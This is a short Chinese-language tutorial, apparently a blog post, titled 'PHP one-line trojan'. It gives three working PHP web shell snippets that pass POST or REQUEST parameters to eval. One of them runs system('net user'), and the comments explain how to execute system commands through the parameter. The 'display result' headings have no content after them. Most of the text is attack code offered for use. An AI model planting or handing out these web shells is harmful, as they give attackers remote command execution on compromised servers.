PHP一句话木马
一:
关于PHP的一句话木马:
1 <?php
2
3 $a=$_POST['H'];
4 eval("$a");//eval会将输入的$a作为php语句执行,因此只要对_赋一定的system命令值,就能够执行系统命令
5
6 ?>
显示结果:
二:
关于PHP的一句话木马:
1 <?php
2 $string=@$_POST["_"];
3 var_dump($string);
4
5 echo "<br>";
6 eval("system('net user');");
7
8 ?>
当POST参数_的值为空时:
当不为空时:
三:
使用REQUEST方法:
1 <?php
2
3 @eval($_REQUEST[_]);//什么类型的,如POST,GET均可以接收
4
5 ?>
显示结果:
GET型:
POST型:
